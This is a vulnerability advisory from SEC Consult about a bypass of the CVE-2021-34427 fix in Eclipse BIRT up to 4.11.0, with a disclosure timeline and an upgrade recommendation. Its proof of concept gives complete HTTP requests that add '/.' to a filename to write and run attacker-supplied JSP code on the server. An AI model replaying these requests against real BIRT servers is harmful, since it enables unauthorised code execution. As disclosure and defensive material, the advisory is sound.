Eclipse Business Intelligence Reporting Tool 4.11.0 Remote Code Execution Vulnerability

=======================================================================
               title: Remote code execution - CVE-2021-34427 bypass
             product: Eclipse Business Intelligence Reporting Tool (BiRT)
  vulnerable version: <= 4.11.0
       fixed version: 4.12
          CVE number: CVE-2021-34427
              impact: High
            homepage: https://eclipse.github.io/birt-website/
               found: 2022-10-05
                  by: Armin Stock (Atos)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"With BIRT you can create data visualizations, dashboards and reports
that can be embedded into web applications and rich clients. Make information out
of your data!"

https://eclipse.github.io/birt-website/


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.


Vulnerability overview/description:
-----------------------------------
1) Remote code execution - CVE-2021-34427 bypass
The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/)
allows an attacker to execute code on the server, by creating a `.jsp` file
with the `BiRT - WebViewerExample`. This was fixed with the following code:

-------------------------------------------------------------------------------
// viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081
  protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException {
    int extIndex = rptDocumentName.lastIndexOf(".");
    String extension = null;
    boolean validExtension = true;

    if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) {
      extension = rptDocumentName.substring(extIndex + 1);

      if (!disallowedExtensionsForRptDocument.isEmpty()
          && disallowedExtensionsForRptDocument.contains(extension)) {
        validExtension = false;
      }

      if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) {
        validExtension = false;
      }

      if (!validExtension) {
        throw new ViewerException(BirtResources.getMessage(
            ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension }));
      }

    }
  }
-------------------------------------------------------------------------------

This fix can be easily bypassed by adding `/.` to the filename which allows
an attacker to execute arbitrary code.


Proof of concept:
-----------------
1) Remote code execution - CVE-2021-34427 bypass
The old exploit results in an error message:

-------------------------------------------------------------------------------
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " + 
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1
Host: IP:18080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A
Upgrade-Insecure-Requests: 1
-------------------------------------------------------------------------------

Response:
-------------------------------------------------------------------------------
HTTP/1.1 200
Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2022 06:14:54 GMT
Connection: close
Content-Length: 4644

<html>
<head>
<title>Error</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>
</head>
<body>
<div id="birt_errorPage" style="color:red">
<span id="error_icon"  style="cursor:pointer" onclick="if (document.getElementById('error_detail').style.display == 'none') { document.getElementById('error_icon').innerHTML = '- '; 
document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > + 
</span>

Invalid extension - "jsp" for the __document parameter.
-------------------------------------------------------------------------------

But adding `/.` to the end of the filename creates the file on the server as
before:

-------------------------------------------------------------------------------
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " + 
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> HTTP/1.1
Host: IP:18080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A
Upgrade-Insecure-Requests: 1

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------
HTTP/1.1 200
Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Wed, 05 Oct 2022 05:26:01 GMT
Connection: close
Content-Length: 283

<html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head>
<body style="background-color: #ECE9D8;">
<div style="font-size:10pt;"><font color="black">
The report document file has been generated successfully.</font>
</div></body></html>
-------------------------------------------------------------------------------

This allows the execution of the provided `JSP` code, by calling
`/birt/test/info-new.jsp`.


Vulnerable / tested versions:
-----------------------------
The following version has been tested, but all versions <= 4.11 are vulnerable.
* 4.10.0 (2022-10-01)


Vendor contact timeline:
------------------------
2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994)
2022-11-17: Vendor confirmed the bypass and is working on a fix.
2022-11-17: Vendor provided a fix.
2022-11-27: The fix was tested and could be bypassed again.
2022-11-27: Vendor acknowledged the bypass and provided a new fix.
2022-11-28: The fix was tested and we were not able to bypass it.
2022-11-30: Vendor releases patched version 4.12
2022-12-16: Public release of security advisory.


Solution:
---------
Update Eclipse BIRT to version 4.12 or newer from the vendor's website:
https://projects.eclipse.org/projects/technology.birt/releases/4.12.0